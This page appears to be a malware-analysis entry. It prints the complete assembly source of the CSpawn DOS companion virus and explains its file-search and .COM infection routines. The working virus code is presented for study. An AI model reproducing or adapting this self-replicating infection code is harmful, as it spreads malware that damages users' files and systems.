CSpawn Virus (COM companion virus)
aka Virus.DOS.Companion.180 (Kaspersky)
Source Code
;The CSpawn virus is a simple companion virus to illustrate how a companion
;virus works.
;
;(C) 1994 American Eagle Publications, Inc. All Rights Reserved!
.model tiny
.code
org 0100h
CSpawn:
mov sp,OFFSET FINISH + 100H ;Change top of stack
mov ah,4AH ;DOS resize memory fctn
mov bx,sp
mov cl,4
shr bx,cl ;BX=# of para to keep
inc bx
int 21H ;set up EXEC param block
mov bx,2CH
mov ax,[bx]
mov WORD PTR [PARAM_BLK],ax ;environment segment
mov ax,cs
mov WORD PTR [PARAM_BLK+4],ax ;@ of parameter string
mov WORD PTR [PARAM_BLK+8],ax ;@ of FCB1
mov WORD PTR [PARAM_BLK+12],ax;@ of FCB2
mov dx,OFFSET REAL_NAME ;prep to EXEC
mov bx,OFFSET PARAM_BLK
mov ax,4B00H
int 21H ;execute host
cli
mov bx,ax ;save return code here
mov ax,cs ;AX holds code segment
mov ss,ax ;restore stack first
mov sp,(FINISH - CSpawn) + 200H
sti
push bx
mov ds,ax ;Restore data segment
mov es,ax ;Restore extra segment
mov ah,1AH
mov dx,80H
int 21H ;DOS set DTA function
;put DTA at offset 80H
call FIND_FILES ;Find and infect files
pop ax ;AL holds return value
mov ah,4CH
int 21H ;DOS terminate function
;bye-bye
;The following routine searches for COM files and infects them
FIND_FILES:
mov dx,OFFSET COM_MASK ;search for COM files
mov ah,4EH
xor cx,cx ;CX holds all file attributes
FIND_LOOP:
int 21H
jc FIND_DONE ;Exit if no files found
call INFECT_FILE ;Infect the file!
mov ah,4FH
jmp FIND_LOOP ;Try finding another file
FIND_DONE:
ret ;Return to caller
COM_MASK db '*.COM',0 ;COM file search mask
;This routine infects the file specified in the DTA.
INFECT_FILE:
mov si,9EH ;DTA + 1EH
mov di,OFFSET REAL_NAME ;DI points to new name
INF_LOOP:
lodsb
stosb
or al,al
jnz INF_LOOP ;Is it a NULL?
mov WORD PTR [di-21],'N'
mov dx,9EH
mov di,OFFSET REAL_NAME
mov ah,56H
int 21H ;rename original file
jc INF_EXIT ;if can’t rename, already done
mov ah,3CH
mov cx,2
int 21H ;DOS create file function
;set hidden attribute
mov bx,ax ;BX holds file handle
mov ah,40H
mov cx,FINISH - CSpawn
mov dx,OFFSET CSpawn
int 21H ;DOS write to file function
mov ah,3EH
int 21H ;DOS close file function
INF_EXIT:
ret
REAL_NAME db 13 dup (?)
;Name of host to execute
;DOS EXEC function parameter block
PARAM_BLK DW ? ;environment segment
DD 80H ;@ of command line
DD 5CH ;@ of first FCB
DD 6CH ;@ of second FCB
FINISH:
end CSpawn
Analyze
-
Program Setup and Memory Management:
.model tinyand.codeset up the assembly language environment for a small, single-segment program.org 0100hspecifies the program’s starting offset, a standard for DOS .COM files.- The initial code adjusts the stack pointer and resizes the memory block to fit the virus, ensuring it has enough space to operate.
-
Execution Parameter Block Setup:
- The code sets up a DOS EXEC function parameter block (
PARAM_BLK). This is used to execute the host program after the virus runs.
- The code sets up a DOS EXEC function parameter block (
-
Launching the Original Program:
- The virus locates and prepares to execute the original program (the one it is attached to) using a DOS function call (
int 21Hwithah=4B00H).
- The virus locates and prepares to execute the original program (the one it is attached to) using a DOS function call (
-
System State Preservation:
- It saves and later restores critical system state information (like registers and stack pointers) to ensure smooth execution of both the virus and the host program.
-
File Search and Infection Routine:
FIND_FILES: Searches for.COMfiles in the current directory.- It uses DOS interrupts to find (
int 21Hwithah=4EH) and loop through files (int 21Hwithah=4FH).
-
Infection Mechanism:
INFECT_FILE: When a.COMfile is found, this routine is called to infect it.- It renames the original file and creates a new file with the original name, which is actually the virus.
- The virus writes its own code to the new file and sets it as hidden.
-
Termination:
- After infecting files, it restores the original return code from the host program and terminates itself using the DOS terminate function (
int 21Hwithah=4CH).
- After infecting files, it restores the original return code from the host program and terminates itself using the DOS terminate function (
-
Data and Strings:
COM_MASK,REAL_NAME, andPARAM_BLKare data used for file searching, storing the original file name, and holding execution parameters, respectively.
This virus demonstrates a classic companion virus strategy: it attaches itself to executable files and runs itself first, potentially performing malicious actions, before running the original executable. It’s a good example of early virus coding techniques and DOS system programming.
Details
File Search and Infection Routine
FIND_FILES:
mov dx,OFFSET COM_MASK ; search for COM files
mov ah,4EH
xor cx,cx ; CX holds all file attributes
FIND_LOOP:
int 21H
jc FIND_DONE ; Exit if no files found
call INFECT_FILE ; Infect the file!
mov ah,4FH
jmp FIND_LOOP ; Try finding another file
FIND_DONE:
ret ; Return to caller
COM_MASK db '*.COM',0 ; COM file search mask`
Detailed Explanation
-
Initializing File Search:
mov dx,OFFSET COM_MASK: Sets up theDXregister to point to the string'*.COM', which is the search pattern for finding.COMfiles.mov ah,4EHandxor cx,cx: Prepares for a DOS function call to find the first file matching the.COMpattern.AH=4EHis the DOS function for “Find First File”, andCXis cleared to 0 to search for files with any attribute (including hidden, system, etc.).
-
Searching Loop:
int 21H: This interrupt call performs the actual file search.jc FIND_DONE: If the ‘carry flag’ is set (indicated byjc, jump if carry), no more files are found, and the routine exits.call INFECT_FILE: Calls the routine to infect the found file.mov ah,4FH: Prepares for the “Find Next File” DOS function.- The
jmp FIND_LOOPcauses the program to loop back and search for the next.COMfile.
Infection Mechanism
Code Overview
INFECT_FILE:
mov si,9EH ; DTA + 1EH
mov di,OFFSET REAL_NAME ; DI points to new name
INF_LOOP:
lodsb
stosb
or al,al
jnz INF_LOOP ; Is it a NULL?
mov WORD PTR [di-21],'N'
mov dx,9EH
mov di,OFFSET REAL_NAME
mov ah,56H
int 21H ; rename original file
jc INF_EXIT ; if can’t rename, already done
mov ah,3CH
mov cx,2
int 21H ; DOS create file function
; set hidden attribute
mov bx,ax ; BX holds file handle
mov ah,40H
mov cx,FINISH - CSpawn
mov dx,OFFSET CSpawn
int 21H ; DOS write to file function
mov ah,3EH
int 21H ; DOS close file function
INF_EXIT:
ret
Detailed Explanation
-
Copying the File Name:
- The
INFECT_FILEroutine begins by setting upSIandDIregisters to point to the location of the file name in the Disk Transfer Area (DTA) and a buffer (REAL_NAME), respectively. - The
INF_LOOPcopies the file name from the DTA toREAL_NAMEbyte by byte (usinglodsbandstosb). The loop continues until it encounters a NULL byte, indicating the end of the file name.
- The
-
Renaming the Original File:
- After copying the file name, the code modifies the name slightly (
mov WORD PTR [di-21],'N') to avoid overwriting the original file. - It then renames the original file using
int 21Hwithah=56H(DOS rename file function).
- After copying the file name, the code modifies the name slightly (
-
Creating the Infected File:
mov ah,3CHandmov cx,2: Sets up for the DOS create file function with the hidden attribute.- The virus then creates a new file with the original file’s name.
-
Writing the Virus to the New File:
- The file handle returned from the file creation is in
AXand moved toBX. mov ah,40H: Prepares for the DOS write file function.- The virus writes its own code (
CSpawn) into the new file.
- The file handle returned from the file creation is in
-
Closing the File:
- Finally, the file is closed using
int 21Hwith `ah=3EH
- Finally, the file is closed using
Links
- https://www.virustotal.com/gui/file/1595635f489d129b6cb2a3f336b00af946eadefc23650493ac4ba4c751bc6eae
- https://mwdb.cert.pl/file/1595635f489d129b6cb2a3f336b00af946eadefc23650493ac4ba4c751bc6eae
Sponsored by 